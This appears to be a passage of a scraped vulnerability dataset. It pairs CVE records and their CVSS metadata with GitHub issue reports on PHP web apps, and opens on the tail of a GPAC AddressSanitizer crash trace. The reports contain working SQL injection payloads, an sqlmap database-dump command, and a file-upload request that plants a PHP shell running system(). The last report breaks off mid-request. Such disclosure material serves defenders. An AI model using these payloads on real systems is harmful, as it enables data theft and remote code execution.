xml_sax_parse_attribute utils/xml_parser.c:397 #7 0x7f54fb94fe5d in xml_sax_parse utils/xml_parser.c:940 #8 0x7f54fb951cce in gf_xml_sax_parse_intern utils/xml_parser.c:1104 #9 0x7f54fb952507 in gf_xml_sax_parse utils/xml_parser.c:1132 #10 0x7f54fb952818 in xml_sax_read_file utils/xml_parser.c:1219 #11 0x7f54fb9539aa in gf_xml_sax_parse_file utils/xml_parser.c:1331 #12 0x7f54fc2666ba in load_xmt_run scene_manager/loader_xmt.c:3144 #13 0x7f54fc93db85 in ctxload_process filters/load_bt_xmt.c:522 #14 0x7f54fc67ed9d in gf_filter_process_task filter_core/filter.c:3164 #15 0x7f54fc64a599 in gf_fs_thread_proc filter_core/filter_session.c:2145 #16 0x7f54fc64e903 in gf_fs_run filter_core/filter_session.c:2452 #17 0x7f54fc0cc145 in gf_media_import media_tools/media_import.c:1239 #18 0x5647e6b54da4 in convert_file_info /home/ubuntu/gpac_testt/gpac/applications/mp4box/fileimport.c:130 #19 0x5647e6b2212d in mp4box_main /home/ubuntu/gpac_testt/gpac/applications/mp4box/mp4box.c:6398 #20 0x7f54f989fc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-use-after-free scene_manager/loader_xmt.c:531 in xmt_resolve_od_links Shadow bytes around the buggy address: 0x0c0e7fffe3b0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 00 0x0c0e7fffe3c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa 0x0c0e7fffe3d0: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0e7fffe3e0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 0x0c0e7fffe3f0: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd =>0x0c0e7fffe400: fd fd fd fd fd fd fa fa fa fa[fd]fd fd fd fd fd 0x0c0e7fffe410: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0e7fffe420: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 00 0x0c0e7fffe430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fffe440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fffe450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==18912==ABORTING ``` ## poc [poc.zip](https://github.com/user-attachments/files/15801189/poc.zip)
Heap-use-after-free scene_manager/loader_xmt.c:531 in xmt_resolve_od_links
https://api.github.com/repos/gpac/gpac/issues/2874/comments
2
2024-06-12T08:34:24Z
2024-06-18T07:43:59Z
https://github.com/gpac/gpac/issues/2874
2,348,161,533
2,874
6,088
CVE-2024-6065
2024-06-17T21:15:52.007
A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument user_email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268793 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/ppp-src/CVE/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268793" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268793" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358386" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/ppp-src/CVE/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358386" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:bakery_online_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BF7A73B7-CA75-4CF3-AE1D-54B35F99D710", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/CVE/issues/4
[ "Exploit" ]
github.com
[ "ppp-src", "CVE" ]
# Itsourcecode Bakery Online Ordering System Using PHP and MySQL Database 1.0 report/index.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Bakery Online Ordering System Using PHP and MySQL Database ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + polaris0x1 ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2017/04/katerina.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php' file of the 'Bakery Online Ordering System Using PHP and MySQL Database' project. The reason for this issue is that attackers inject malicious code from the parameter "user_email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of "Bakery Online Ordering System Using PHP and MySQL Database", discovered a critical SQL injection vulnerability in the "index.php" file. This vulnerability stems from insufficient user input validation of the 'user_email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + error-based + time-based blind ## Vulnerability location: + 'user_email' parameter ## Payload: ```sql user_email=111' AND 5949=(SELECT (CASE WHEN (5949=5949) THEN 5949 ELSE (SELECT 3559 UNION SELECT 7396) END))-- -&user_pass=qqqqqqqqqqqqqq&btnLogin= user_email=111' AND (SELECT 7146 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(7146=7146,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XZJo&user_pass=qqqqqqqqqqqqqq&btnLogin= user_email=111' AND 1861=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- kQqf&user_pass=qqqqqqqqqqqqqq&btnLogin= ``` ```makefile Parameter: user_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user_email=111' AND 5949=(SELECT (CASE WHEN (5949=5949) THEN 5949 ELSE (SELECT 3559 UNION SELECT 7396) END))-- -&user_pass=qqqqqqqqqqqqqq&btnLogin= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user_email=111' AND (SELECT 7146 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(7146=7146,1))),0x716b707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XZJo&user_pass=qqqqqqqqqqqqqq&btnLogin= Type: time-based blind Title: MySQL > 5.0.12 AND time-based blind (heavy query) Payload: user_email=111' AND 1861=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- kQqf&user_pass=qqqqqqqqqqqqqq&btnLogin= ``` + ![1](https://github.com/ppp-src/CVE/assets/167133866/2290b69e-f09f-459c-b669-f82c875e441c) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://localhost:8101/index.php" --data="user_email=111&user_pass=qqqqqqqqqqqqqq&btnLogin=" --method=POST --level=5 --risk=3 --batch --dbs --dump ___ ``` + ![2](https://github.com/ppp-src/CVE/assets/167133866/749843c7-f129-4b87-b91a-160006473270) + ![3](https://github.com/ppp-src/CVE/assets/167133866/d1db4fca-beab-43ba-b0be-124e616f7520) + ![4](https://github.com/ppp-src/CVE/assets/167133866/b4689bcb-78cf-494f-b227-6259c0434f44) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Bakery Online Ordering System Using PHP and MySQL Database 1.0 report/index.php SQL injection
https://api.github.com/repos/ppp-src/CVE/issues/4/comments
0
2024-06-16T23:28:05Z
2024-06-16T23:28:05Z
https://github.com/ppp-src/CVE/issues/4
2,356,047,127
4
6,089
CVE-2024-6084
2024-06-18T01:15:20.333
A vulnerability has been found in itsourcecode Pool of Bethesda Online Reservation System up to 1.0 and classified as critical. Affected by this vulnerability is the function uploadImage of the file /admin/mod_room/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268825 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/Laster-dev/CVE/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268825" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268825" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358628" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/Laster-dev/CVE/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268825" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268825" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358628" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:janobe:pool_of_bethesda_online_reservation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9DE894B7-EE1B-4ABB-8881-CF3BA3911206", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/Laster-dev/CVE/issues/2
[ "Exploit" ]
github.com
[ "Laster-dev", "CVE" ]
# Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Pool of Bethesda Online Reservation System Using PHP ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + laster ## Vulnerable File + controller.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2016/05/BethesdaReservation1.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + In line 80 of the controller.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows: + ![1](https://github.com/Laster-dev/CVE/assets/142156774/cda646d6-a05e-4dd1-b788-016e6d64fbf4) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE # DESCRIPTION + laster discovered that the file upload operation was triggered on line 80 of the 'controller.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ## Payload ## ``` POST /admin/mod_room/controller.php?action=add HTTP/1.1 Host: localhost:8102 Content-Length: 2776 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8102 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2d1Mv3huV7gKmnQU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8102/admin/mod_room/index.php?view=add Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="roomNo" 22 ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="name" 22 ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="rmtype" 93 ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="price" 22 ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="adult" 22 ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="children" 22 ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="image"; filename="rce.php" Content-Type: image/jpeg Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show <?php system('ipconfig'); ?> ------WebKitFormBoundary2d1Mv3huV7gKmnQU Content-Disposition: form-data; name="save" ------WebKitFormBoundary2d1Mv3huV7gKmnQU-- ``` + ![2](https://github.com/Laster-dev/CVE/assets/142156774/6fa4bec9-3fcc-491a-80ab-f87058431585) ## I successfully executed the PHP script on the terminal + ![3](https://github.com/Laster-dev/CVE/assets/142156774/3d315efc-91ea-457d-bdda-9a9acf6a171c)
Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload
https://api.github.com/repos/Laster-dev/CVE/issues/2/comments
0
2024-06-17T14:20:59Z
2024-06-17T14:23:22Z
https://github.com/Laster-dev/CVE/issues/2
2,357,481,064
2
6,090
CVE-2024-6109
2024-06-18T12:15:12.987
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file addmeasurement.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268855.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/PHJ-doit/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268855" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268855" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358590" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/PHJ-doit/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.268855" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268855" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.358590" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/PHJ-doit/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "PHJ-doit", "cve" ]
# Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addmeasurement.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Tailoring Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + PHJ-doit ## Vulnerable File + addmeasurement.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'addmeasurement.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="936" alt="1" src="https://github.com/PHJ-doit/cve/assets/173027847/07246e6a-9de2-4f43-ba21-0e4fde3547a4"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC POST /addmeasurement.php?id=1 HTTP/1.1 Host: 192.168.1.138:2223 Content-Length: 95 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.138:2223 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: 